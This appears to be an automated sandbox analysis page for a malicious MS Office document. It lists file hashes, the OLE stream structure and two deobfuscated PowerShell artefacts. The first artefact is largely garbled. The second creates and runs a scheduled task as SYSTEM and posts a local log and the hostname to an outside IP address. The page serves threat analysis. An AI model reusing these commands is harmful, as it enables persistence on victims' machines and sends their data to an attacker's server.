Malicious
Malicious

549b9c352976896bee533ceea5f27395

MS Office Document
|
MD5: 549b9c352976896bee533ceea5f27395
|
Size: 40.96 KB
|
application/vnd.ms-office


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
549b9c352976896bee533ceea5f27395
Sha1
d00bd63040786db48525285421f97ba768225537
Sha256
3879e4ecf84ca8e3cb38c0e3d800f2c937d89fdbabf9133f35be75357151e14c
Sha384
990a7de4848171c2274c201609a5a03e6c97fd774fda4e86870ccacd241d4edacf5faa93461d16bbf137b23ea432ddc8
Sha512
a26454486fd87f76da853ef3a0aafb69acd8c742630935ff4337d040c8fc4c047e41835472d921ae14797bcb24b9bb5fefd09e5997e956e10a62070511660e19
SSDeep
384:CzY+DulnUHA7ticeToW3T1XFFM69q5ICpV1XFFM6ztcq5ICVbi:+IhQstic6hRjqmCpz56qmC
TLSH
C403E65BB3509331E44103314A6FC7E56F74AC849FA25616327AF34C6E31AD066E7EE2
File Structure
549b9c352976896bee533ceea5f27395
Malicious
Root Entry
Malicious
䡀䌏䈯
䡀䈖䌧䠤
䡀㬿䏲䐸䖱
䡀㽿䅤䈯䠶
䡀䈏䗤䕸䠨
䡀䓞䕪䇤䠨
䡀䕙䓲䕨䜷
䡀䌍䈵䗦䕲䠼
䡀䒌䓰䑲䑨䠷
䡀㼿䕷䑬㭪䗤䠤
䡀㼿䕷䑬㹪䒲䠯
䡀㿿䏤䇬䗤䒬䠱
䡀䖖㯬䏬㱨䖤䠫
䡀䘌䗶䐲䆊䌷䑲
䡀䄕䑸䋦䒌䇱䗬䒬䠱
䡀䇊䌰㾱㼒䔨䈸䆱䠨
䡀䈏䗤䕸㬨䐲䒳䈱䗱䠶
䡀䑒䗶䏤㾯㼒䔨䈸䆱䠨
䡀䇊䌰㮱䈻䘦䈷䈜䘴䑨䈦
䡀䇊䗹䛎䆨䗸㼨䔨䈸䆱䠨
䡀䑒䗶䏤㮯䈻䘦䈷䈜䘴䑨䈦
SummaryInformation
Artefacts
Name
Value
Deobfuscated PowerShell

^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "logebula/run" ":" "T" "fi???????????????AS" Write-Output "BAT" "finitRu>>" "??????????????" "=" "aho" "r??????????????" " " "P" "f" "?????" " " "eo" "??????????" "=" ".R" "r???????????or" "Green" >> "aho r????????????oebPT!" "ec" "t" "o" "==" "????????????????" "??????????" "n" "SilentlyContR" "SilentlyContinu" "t" "at" "." "Silen" "e n " "d?????????" "????" "lyP /i??R om } >> !SCRIPR" "Silen" "e neP !SCR.m"

Deobfuscated PowerShell

^ /sc "onstart" "^" /delay "0001:00" "^" /ru "SYSTEM" "^" /f :: "=====" "RUN" "TASK" "NOW" "=====" Write-Output "Running" "task" "now" schtasks "/run" "/tn" "1nstalat10n" Write-Output "BAT" "finished" Write-Output "Sending" "BAT" "log" "to" "server..." echo. ipconfig echo. powershell -Command "^" "Invoke-WebRequest -Uri 'http://45.61.130.146/log.php' -Method Post -Body @{log=(Get-Content 'C:\InstallNebula_bat.log' -Raw); hostname=$env:COMPUTERNAME} -ContentType 'application/x-www-form-urlencoded'" ^ >> "%BAT_LOG%" exit

549b9c352976896bee533ceea5f27395 (40.96 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙